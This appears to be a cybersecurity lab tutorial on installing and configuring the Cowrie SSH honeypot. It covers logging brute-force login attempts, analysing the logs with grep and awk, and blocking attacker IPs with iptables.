Logo Light

Network

Web Apps

System

Cloud

Cryptography

IoT

Exercise 27: Creating a Honeypot to Detect Attacks

by | Feb 5, 2025 | 0 comments

Objective

Deploy a simple honeypot to detect and log malicious activities, analyze attacker behavior, and identify potential threat actors.

Scenario

As a security analyst, you’re tasked with monitoring unauthorized access attempts to your network. Deploying a honeypot can help detect brute-force attacks and malicious activities. In this exercise, you’ll set up a lightweight SSH honeypot using Cowrie, monitor logs for suspicious behavior, and analyze the captured data to identify attackers.

⚠️ Important: Perform this exercise in a controlled lab environment. Do not expose honeypots on production networks without proper security measures.

Lab Instructions

Step 1: Set Up the Environment

  • Use a virtual machine (VM) or a dedicated server for the honeypot.
  • Install a Linux distribution (e.g., Ubuntu Server).

Step 2: Install Cowrie Honeypot

Update the system: 

sudo apt update && sudo apt upgrade -y

Install dependencies: 

sudo apt install git python3 python3-venv python3-pip libssl-dev libffi-dev build-essential libpython3-dev -y

Clone the Cowrie repository: 

git clone https://github.com/cowrie/cowrie.git cd cowrie

Create a Python virtual environment: 

python3 -m venv cowrie-env source cowrie-env/bin/activate

Install required Python packages: 

pip install -r requirements.txt

Step 3: Configure Cowrie

Copy the default configuration: 

cp etc/cowrie.cfg.dist etc/cowrie.cfg

Edit the configuration file to simulate an SSH server: 

nano etc/cowrie.cfg

Set the listening port to 22 to mimic a real SSH server: 

listen_endpoints = ssh:tcp:22

Allow non-root binding to port 22 using authbind: 

sudo apt install authbind -y 
sudo touch /etc/authbind/byport/22 
sudo chmod 500 /etc/authbind/byport/22 
sudo chown cowrie:cowrie /etc/authbind/byport/22

Step 4: Start the Honeypot

Start Cowrie: 

bin/cowrie start

Verify that the honeypot is running: 

bin/cowrie status

Step 5: Monitor Honeypot Logs

Cowrie logs SSH login attempts and commands: 

tail -f var/log/cowrie/cowrie.log

Analyze the failed login attempts, usernames, and passwords used.

View commands executed by attackers: 

cat var/log/cowrie/tty/*.log

Step 6: Analyze Collected Data

Identify source IP addresses of attackers: 

grep "login attempt" var/log/cowrie/cowrie.log | awk '{print $NF}' | sort | uniq -c | sort -nr

Extract attempted usernames and passwords: 

grep "login attempt" var/log/cowrie/cowrie.log | awk -F "user='|', password='" '{print $2, $3}'

Step 7: Mitigation and Further Analysis

Use the data to block malicious IPs at the firewall: 

sudo iptables -A INPUT -s <malicious-ip> -j DROP

Report malicious IPs to security intelligence feeds.

Solution & Explanation

How Honeypots Work

  • Honeypots simulate vulnerable services to lure attackers.
  • They record unauthorized access attempts and actions taken by attackers.

Why Honeypots Are Valuable

  • Early Detection: Detect brute-force attacks and exploitation attempts.
  • Behavior Analysis: Understand attacker tactics and tools.
  • Threat Intelligence: Identify malicious IPs and common attack vectors.

Example Log Entry

2024-01-19 12:45:32+0000 [SSHService ssh-userauth on HoneyPotTransport,1,192.168.1.200] login attempt [user: root, password: 123456] failed

Mitigation Strategies

  1. Deploy Honeypots Strategically: Place in DMZ or isolated networks.
  2. Monitor Regularly: Analyze logs for attack patterns.
  3. Block Malicious IPs: Use firewall rules or intrusion prevention systems.
  4. Share Threat Intelligence: Report attacker behavior to relevant databases.

Testing & Verification

  • Attempt to SSH into the honeypot from another machine: ssh root@<honeypot-ip>
  • Verify that login attempts are logged in cowrie.log.

Security Best Practices

  1. Isolate Honeypots: Prevent attackers from pivoting into production systems.
  2. Limit Data Exposure: Avoid deploying honeypots that store sensitive data.
  3. Use Threat Intelligence: Compare captured data with known attack indicators.
  4. Regular Updates: Keep honeypot tools updated to avoid detection.

Additional Script (Optional)

Automate Cowrie installation and setup:

#!/bin/bash
# Automate Cowrie Honeypot Deployment
sudo apt update && sudo apt install git python3 python3-venv python3-pip authbind -y
cd /opt
sudo git clone https://github.com/cowrie/cowrie.git
cd cowrie
python3 -m venv cowrie-env
source cowrie-env/bin/activate
pip install -r requirements.txt
cp etc/cowrie.cfg.dist etc/cowrie.cfg
sudo touch /etc/authbind/byport/22
sudo chmod 500 /etc/authbind/byport/22
sudo chown $USER /etc/authbind/byport/22
bin/cowrie start

Run the script:

chmod +x deploy_cowrie.sh
sudo ./deploy_cowrie.sh

Conclusion

In this exercise, you deployed and configured Cowrie as an SSH honeypot, monitored logs for brute-force attacks, and analyzed malicious activity. Honeypots provide valuable insights into attacker behavior and are essential for proactive network security.

0 Comments

Submit a Comment

Your email address will not be published. Required fields are marked *